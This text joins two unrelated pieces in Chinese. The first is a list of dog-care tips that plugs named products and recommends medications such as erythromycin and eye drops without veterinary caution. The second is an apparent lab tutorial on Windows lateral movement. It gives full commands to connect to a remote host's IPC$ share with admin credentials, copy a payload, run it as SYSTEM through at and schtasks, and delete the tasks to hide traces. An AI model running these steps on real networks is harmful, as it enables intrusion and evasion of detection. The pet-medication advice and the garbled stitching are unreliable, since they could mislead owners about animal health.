1、遛狗一定要牽繩,那是生命線!
2、補鈣不用買鈣片,不要錢的雞蛋殼磨成粉就行
3、狗狗斷尾千萬別做,社交需要尾巴
4、狗狗吃飯太快,碗換成大盤子,容器越大吃的越慢
5、狗子淚痕總不好,試試【牽貝體木爾+明健來滴眼液】淚痕淚漬都消失,還不fu發~
6、尿不濕收其他人小孩沒用完的,尿墊買人用護理墊。
7、狗子呼吸困難,吃煥心依夢牛肉錠
8、狗窩是純棉的,狗就不會臭或者臭的慢
9、狗真的一點木糖醇都不能碰,會要狗命
10、淚痕反復:牽貝體木爾
11、淚漬眼屎:明健來滴眼液
12、清洗耳朵:生理鹽水
13、掉毛:補維生素B
14、趾間yan:紅霉素
15、缺營養:羊奶粉
#萌寵# #家有萌寵# #狗# #新手養狗# #新手養寵#
最近研究了一下ATT&CK的內網橫向滲透,黑客很多時候能拿到一個站點的控制權限,但是距離最終的目標還有一定距離,所以就有了「橫向滲透」這個關鍵詞。說白了就是利用跳板機,感染內網其他主機,逐漸接近最終目標。在高級持續性威脅(APT)中尤為常見,被安全分析師津津樂道。本次實驗呢,就是通過建立IPC來控制其他主機搞事情~
【軟件安全】緩沖區溢出攻防 作者 ailx10
為了實現進程間通信而開放的命名管道,IPC可以通過驗證用戶名和密碼,獲得相應的權限。通常在管理遠程計算機和查看計算機的共享資源時使用。
通過ipc$可以和目標機器建立連接,利用這個連接,不僅可以訪問目標機器的文件,進行上傳、下載,還可以在目標機器上運行其他命名。
ailx10
net use \192.168.160.135\ipc$ "W2ngluoanquan" /user:HACKBIJI\Administrator使用windows自帶的工具獲取遠程主機信息
查看遠程主機的C盤文件
dir \192.168.160.135\C$去 192.168.160.135 主機上查看一下C盤,一摸一樣。
查看遠程主機上運行的進程
tasklist /S 192.168.160.135 /U HACKBIJI\Administrator /P W2ngluoanquanat是windows自帶的用于創建計劃任務的命令,使用at命令可以在遠程目標上創建計劃任務,建立定時任務四部曲如下:
步驟一:使用net time 命令確定遠程機器當前的系統時間
net time \192.168.160.135步驟二:使用copy命令將payload文件復制到遠程目標機器中
copy calc.bat \192.168.160.135\c$步驟三:使用at命令定時啟動該payload文件
在下午5點49分啟動calc.bat批批處理任務
at \192.168.160.135 17:49:00 c:\calc.bat到點后,查看到出現了calc.exe進程,成功植入了定時任務,卡的要死。一定要控制好執行頻率,否則肯定會被抓的。
步驟四:刪除使用at命令創建計劃任務的記錄
黑客完成目的之后要清楚痕跡,所以要刪除計劃任務。
at \192.168.160.135 2 /deleteschtasks命令比at命令更加強大、靈活。創建計劃任務,該計劃任務在開機時啟動,運行c盤下的calc.bat批處理任務,運行權限是system。
schtasks /create /s 192.168.160.135 /tn ailx10_task /sc onstart /tr c:\calc.bat /ru system /f /u HACKBIJI\Administrator /p W2ngluoanquan嘗試立即運行這個計劃任務,然后再次查看發現新增了一個calc.exe進程
schtasks /run /s 192.168.160.135 /i /tn "ailx10_task" /u HACKBIJI\Administrator /p W2ngluoanquan 最后刪除計劃任務
schtasks /delete /s 192.168.160.135 /tn "ailx10_task" /f /U HACKBIJI\Administrator /P W2ngluoanquan最后的最后,刪除$ipc,結束戰斗~
net use \192.168.160.135\ipc$ /del /y本篇完~